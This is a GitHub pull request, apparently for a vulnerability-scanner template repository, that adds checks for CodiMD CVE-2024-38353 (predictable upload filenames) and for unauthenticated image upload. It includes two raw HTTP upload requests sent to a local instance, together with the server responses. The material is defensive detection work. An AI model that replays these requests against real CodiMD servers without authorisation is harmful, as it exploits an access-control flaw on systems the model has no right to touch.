Add CodiMD CVE and unauth file upload checks #11300

denandz · 2024-12-05T05:23:19Z

Template / PR Information

Added CVE-2024-38353 and CodiMD unauth file upload checkers
References:
- GHSA-2764-jppc-p2hm
- https://pulsesecurity.co.nz/advisories/codimd-missing-image-access-controls

Template Validation

I've validated this template locally?

YES
NO

Additional Details (leave it blank if not applicable)

Vulnerable to insecure randomness (fixed by CodiMD in 2.5.4 under CVE-2024-38353):

POST /uploadimage HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.7 Safari/537.36
Content-Length: 284
Accept-Encoding: gzip
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------92633278134516118923780781161

-----------------------------92633278134516118923780781161
Content-Disposition: form-data; name="image"; filename="2pmdy4CdZw1P7Ij743Zzw0wJp35.gif"
Content-Type: image/gif

GIF89a...yoink...

HTTP/1.1 200 OK^M
Connection: close^M
Content-Length: 49^M
Codimd-Version: 2.5.3^M
Content-Security-Policy: default-src 'self'; script-src 'self' vimeo.com https://gist.github.com www.slideshare.net https://query.yahooapis.com 'unsafe-eval' https://cdnjs.cloudflare.com https://cdn.jsdelivr.net https://cdn.mathjax.org https://disqus.com https://*.disqus.com https://*.disquscdn.com https://www.google-analytics.com 'nonce-b7da5189-ed5d-4bd6-9e24-7ea66c7aa655' 'sha256-81acLZNZISnyGYZrSuoYhpzwDTTxi7vC1YM4uNxqWaM='; img-src * data:; style-src 'self' 'unsafe-inline' https://github.githubassets.com https://cdnjs.cloudflare.com https://cdn.jsdelivr.net https://fonts.googleapis.com https://*.disquscdn.com; font-src 'self' data: https://public.slidesharecdn.com https://cdnjs.cloudflare.com https://fonts.gstatic.com https://*.disquscdn.com; object-src *; media-src *; child-src *; connect-src *^M
Content-Type: application/json; charset=utf-8^M
Date: Thu, 05 Dec 2024 05:10:36 GMT^M
Etag: W/"31-gm8YloZEu0CYnCLfa37DBbEDZqM"^M
Referrer-Policy: same-origin^M
Set-Cookie: connect.sid=s%3AGfPQaUcUBqIDdFRnxJJpLYQoc2wHZ-WE.fStSBu83X3GLKA3H0QKoViDtNO0%2BZrJIC%2FTCj8JKzm4; Path=/; Expires=Thu, 19 Dec 2024 05:10:36 GMT; HttpOnly^M
X-Powered-By: Express^M
^M
{"link":"/uploads/c0d90fa3da7e1dbcd223d9800.gif"}

Not vulnerable to insecure randomisation, still vulnerable to unauth file upload (hasn't been fixed by CodiMD):

POST /uploadimage HTTP/1.1^M
Host: 127.0.0.1:3000^M
User-Agent: Mozilla/5.0 (Fedora; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0^M
Content-Length: 284^M
Accept-Encoding: gzip^M
Connection: close^M
Content-Type: multipart/form-data; boundary=---------------------------92633278134516118923780781161^M
^M
-----------------------------92633278134516118923780781161^M
Content-Disposition: form-data; name="image"; filename="2pmf7tlK93pfNFb51phi1SyhN6R.gif"^M
Content-Type: image/gif^M
^M
GIF89a...yoink...

HTTP/1.1 200 OK^M
Connection: close^M
Content-Length: 63^M
Codimd-Version: 2.5.4^M
Content-Security-Policy: default-src 'self'; script-src 'self' vimeo.com https://gist.github.com www.slideshare.net https://query.yahooapis.com 'unsafe-eval' https://cdnjs.cloudflare.com https://cdn.jsdelivr.net https://cdn.mathjax.org https://disqus.com https://*.disqus.com https://*.disquscdn.com https://www.google-analytics.com 'nonce-772cd18e-b401-4f75-966c-e163cd89520a' 'sha256-81acLZNZISnyGYZrSuoYhpzwDTTxi7vC1YM4uNxqWaM='; img-src * data:; style-src 'self' 'unsafe-inline' https://github.githubassets.com https://cdnjs.cloudflare.com https://cdn.jsdelivr.net https://fonts.googleapis.com https://*.disquscdn.com; font-src 'self' data: https://public.slidesharecdn.com https://cdnjs.cloudflare.com https://fonts.gstatic.com https://*.disquscdn.com; object-src *; media-src *; child-src *; connect-src *^M
Content-Type: application/json; charset=utf-8^M
Date: Thu, 05 Dec 2024 05:20:08 GMT^M
Etag: W/"3f-rUxaAl4+L8dKya0mzC/Hz8xJ5So"^M
Referrer-Policy: same-origin^M
Set-Cookie: connect.sid=s%3AWhh6OlYhqQMrx5DN2WYKzGJHqVrGEAaz.KrgosQng5%2BZYbA7KQ8hJJwyUQLl7BglxJyKvH9gsTak; Path=/; Expires=Thu, 19 Dec 2024 05:20:08 GMT; HttpOnly^M
X-Powered-By: Express^M
^M
{"link":"/uploads/upload_027ecc8dd217330ea74e5898a823b94d.gif"}

Additional References:

denandz added 3 commits December 5, 2024 18:02

Added CVE-2024-38353 insecure filename randomization check

3dde2cb

Added CodiMD unauthenticated file upload check

bbc371f

fix yamllint issues

6378ad4

princechaddha assigned DhiyaneshGeek Dec 13, 2024

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Add CodiMD CVE and unauth file upload checks #11300

Add CodiMD CVE and unauth file upload checks #11300

denandz commented Dec 5, 2024

Add CodiMD CVE and unauth file upload checks #11300

Are you sure you want to change the base?

Add CodiMD CVE and unauth file upload checks #11300

Conversation

denandz commented Dec 5, 2024

Template / PR Information

Template Validation

Additional Details (leave it blank if not applicable)

Additional References: